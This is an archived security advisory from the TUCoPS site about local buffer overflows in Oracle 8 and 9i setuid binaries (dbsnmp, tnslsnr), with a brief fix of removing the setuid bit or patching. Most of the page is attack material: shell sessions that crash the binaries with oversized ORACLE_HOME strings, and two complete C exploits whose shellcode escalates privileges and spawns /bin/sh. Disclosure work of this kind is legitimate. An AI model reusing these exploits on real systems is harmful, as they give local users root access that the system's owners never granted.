Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Oracle :: orac3138.htm

Oracle 8, 9i - dbsnmp and tnslsnr local buffer overflow via $ORACLE_HOME



2nd Aug 2001 [SBWID-3138]
COMMAND

	dbsnmp and tnslsnr local buffer overflow via $ORACLE_HOME
	

	

SYSTEMS AFFECTED

	    Oracle 8, 9i

	

	

PROBLEM

	    Juan  Manuel  Pascual  Escriba  found  following.  Buffer overflow

	    exists if  ORACLE_HOME enviroment  variable if  is defined  with a

	    size greater than 749 bytes

	
	        [oracle@proves1 iAS]$ ls -alc

	        /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

	        -rwsr-s---    1 root     oinstall   667874 jul 18 15:38

	        /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

	        

	        [oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e \'print \"A\"x749\'`

	        [oracle@proves1 8.1.6]$

	        /usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

	        couldn\'t read file \"/config/nmiconf.tcl\": no such file or directory

	        Failed to initialize nl component,error=462

	        Failed to initialize nl component,error=462

	        

	        [oracle@proves1 8.1.6]$[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e \'print \"A\"x750\'`

	        [oracle@proves1 8.1.6]$ dbsnmp

	        couldn\'t read file \"/config/nmiconf.tcl\": no such file or directory

	        Segmentation fault

	

	    This overflow exists  in newer products  like Oracle 9i  and maybe

	    in older too.

	
	        [oracle@proves1 iAS]$ ls -alc

	        /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

	        -rwsr-s---    1 root     oinstall   971665 abr 11 17:41

	        /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

	        

	        [oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e \'print \"A\"x749\'`

	        [oracle@proves1 iAS]$ /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

	        couldn\'t read file \"/config/nmiconf.tcl\": no such file or directory

	        Failed to initialize nl component,error=462

	        

	        [oracle@proves1 iAS]$ Failed to initialize nl component,error=462

	        [oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e \'print \"A\"x750\'`

	        [oracle@proves1 iAS]$ /usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

	        Segmentation fault

	

	    Any user belonging to oracle group can obtain euid=0.

	
	    /* Exploit code for dbsnmp binary in Oracle 8.1.6.0.0 Linux Platform. I tested it in RH 6.2.

	    

	    dbsnmp makes setresuid(,getuid(),) before reading ORACLE_HOME environment variable. Its necessary to call setuid(0) before normal shellcode.

	    

	    In My tests Offset may vary from 7846 to 7896. Its posible to obtain a normal (uid=oracle) shell for low offsets (incomplete setuid(0) jumps).

	    

	    

	    

	    \"Cae fuego en lugar de mana

	    Se disfraza el asfalto de mar

	    El zapato no encuentra el pedal

	    Parece que anda suelto satanas.\"

	    

				    L.E.Aute

	    

	    

	    

	    This vulnerability was researched by:

		    Juan Manuel Pascual <pask@plazasite.com>

	    

	    Special thanks to:

	    

		    Ivan Sanchez <isanchez@plazasite.com>

		    Mundo Alonso-Cuevillas <mundo@plazasite.com>

	    */

	    

	    

	    

	    

	    

	    #include <stdio.h>

	    #include <stdlib.h>

	    

	    #define BUFFER                                  800

	    #define OFFSET                                 7896

	    #define NOP                                    0x90

	    #define BINARY  \"/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp\"

	    

	    

	    char shellcode[] =

	    \"x90\"		/* Additional NOP */

	    \"x31xc0\"	/* begin setuid (0) */

	    \"x31xdb\"

	    \"xb0x17\"

	    \"xcdx80\"

	    

	    \"xebx1f\"

	    \"x5e\"

	    \"x89x76x08\"

	    \"x31xc0\"

	    \"x88x46x07\"

	    \"x89x46x0c\"

	    \"xb0x0b\"

	    \"x89xf3\"

	    \"x8dx4ex08\"

	    \"x8dx56x0c\"

	    \"xcdx80\"

	    \"x31xdb\"

	    \"x89xd8\"

	    \"x40\"

	    \"xcdx80\"

	    \"xe8xdcxffxffxff\"

	    \"/bin/sh\";

	    

	    

	    unsigned long get_sp(void) {

	       __asm__(\"movl %esp,%eax\");

	    }

	    

	    void main(int argc, char *argv[]) {

	      char *buff, *ptr,binary[120];

	      long *addr_ptr, addr;

	      int bsize=BUFFER;

	      int i,offset=OFFSET;

	    

	      if (!(buff = malloc(bsize))) {

	        printf(\"Can\'t allocate memory.n\");

	        exit(0);

	      }

	    

	      addr = get_sp() -offset;

	      ptr = buff;

	      addr_ptr = (long *) ptr;

	      for (i = 0; i < bsize; i+=4)

	        *(addr_ptr++) = addr;

	    

	      memset(buff,bsize/2,NOP);

	    

	    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

	      for (i = 0; i < strlen(shellcode); i++)

	        *(ptr++) = shellcode[i];

	    

	    buff[bsize - 1] = \'\';

	    setenv(\"ORACLE_HOME\",buff,1);

	    system(BINARY);

	    }

	

	

	 Update (03 April 2002)

	 ======

	

	KF/Snosoft [http://www.snosoft.com] posted an exploit for Oracle  8i  on
	Linux via tns listner :
	

	

	/*

	 * Yet another exploit for the \'Unbreakable\' Oracle database

	 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)

	 * Shellcode created by r0z / Promisc

	 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)

	 *

	 * This exploit was developed on the Snosoft vulnerability research machines

	 * mail dotslash@snosoft.com if you wish to participate in vuln research. 

	 *

	 * - The Itch

	 * - itchie@promisc.org

	 *

	 * - Technical details concerning the exploit -

	 *

	 * 1). Buffer overflow occurs after writing more then 2132 bytes into the

	 *     buffer at the command line 2128 to overwrite ebp, 2132 to

	 *     overwrite eip).

	 * 2). If you write more then 2132 bytes, other frames will be

	 *     overwritten afterwards and will mess up your flow of arbitrary code

	 *     execution. (It must be exactly 2132 bytes!)

	 * 3). shellcode will try to do a setreuid(515);

	 */

	

	#include <stdio.h>

	#include <stdlib.h>

	

	#define DEFAULT_EGG_SIZE 4096

	#define NOP 0x90

	

	/* 2132 + 1 for the \\0 at the end of the string */

	#define DEFAULT_BUFFER_SIZE 2133

	

	

	/* Shellcode made by r0z (r0z@promisc.org) */

	char shellcode[] =

	         \"\\x31\\xdb\"              /* xor   %ebx, %ebx     */

	         \"\\x31\\xc9\"              /* xor   %ecx, %ecx     */

	         \"\\xf7\\xe3\"              /* mul   %ebx           */

	         \"\\xb0\\x46\"              /* mov   $0x46, %al     */

	         \"\\x66\\xbb\\x03\\x02\"      /* mov   $0x1fc, %bx    */

	         \"\\x49\"                  /* dec   %ecx           */

	         \"\\xcd\\x80\"              /* int   $0x80          */

	         \"\\x31\\xd2\"              /* xor   %edx, %edx     */

	         \"\\x52\"                  /* push  %edx           */

	         \"\\x68\\x6e\\x2f\\x73\\x68\"  /* push  $0x68732f6e    */

	         \"\\x68\\x2f\\x2f\\x62\\x69\"  /* push  $0x69622f2f    */

	         \"\\x89\\xe3\"              /* mov   %esp, %ebx     */

	         \"\\x52\"                  /* push  %edx           */

	         \"\\x53\"                  /* push  %ebx           */

	         \"\\x89\\xe1\"              /* mov   %esp, %ecx     */

	         \"\\x6a\\x0b\"              /* pushl $0xb           */

	         \"\\x58\"                  /* pop   %eax           */

	         \"\\xcd\\x80\";             /* int   $0x80          */

	

	int main(int argc, char *argv[])

	{

	        char *buff;

	        char *egg;

	        char *ptr;

	        long *addr_ptr;

	        long addr;

	        int bsize = DEFAULT_BUFFER_SIZE;

	        int eggsize = DEFAULT_EGG_SIZE;

	        int i;

	        int get_sp = (int)&get_sp;

	

	        if(argc > 1) { bsize = atoi(argv[1]); }

	

	        if(!(buff = malloc(bsize)))

	        {

	                printf(\"unable to allocate memory for %d bytes\\n\", bsize);

	                exit(1);

	        }

	

	        if(!(egg = malloc(eggsize)))

	        {

	                printf(\"unable to allocate memory for %d bytes\\n\", eggsize);

	                exit(1);

	        }

	

	        printf(\"Oracle tnslsrn 8.1.5\\n\");

	        printf(\"Vulnerability found by KF / http://www.snosoft.com\\n\");

	        printf(\"Coded by The Itch / http://www.promisc.org\\n\\n\");

	        printf(\"Using return address: 0x%x\\n\", get_sp);

	        printf(\"Using buffersize    : %d\\n\", bsize - 1);

	

	        ptr = buff;

	        addr_ptr = (long *) ptr;

	        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

	

	        ptr = egg;

	        for(i = 0; i < eggsize - strlen(shellcode)-1; i++)

	        {

	                *(ptr++) = NOP;

	        }

	

	        for(i = 0; i < strlen(shellcode); i++)

	        {

	                *(ptr++) = shellcode[i];

	        }

	

	        egg[eggsize - 1] = \'\\0\';

	        memcpy(egg, \"EGG=\", 4);

	        putenv(egg);

	        buff[bsize - 1 ]= \'\\0\';

	        execl(\"/home/u01/app/oracle/product/8.1.5/bin/tnslsnr\",

	              \"tnslsnr\", buff, 0);

	        return 0;

	}

	

SOLUTION

	Remove the setuid bit from the file (chmod -s dbsnmp) or apply the available patch which can be downloaded from

	http://metalink.oracle.com.

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH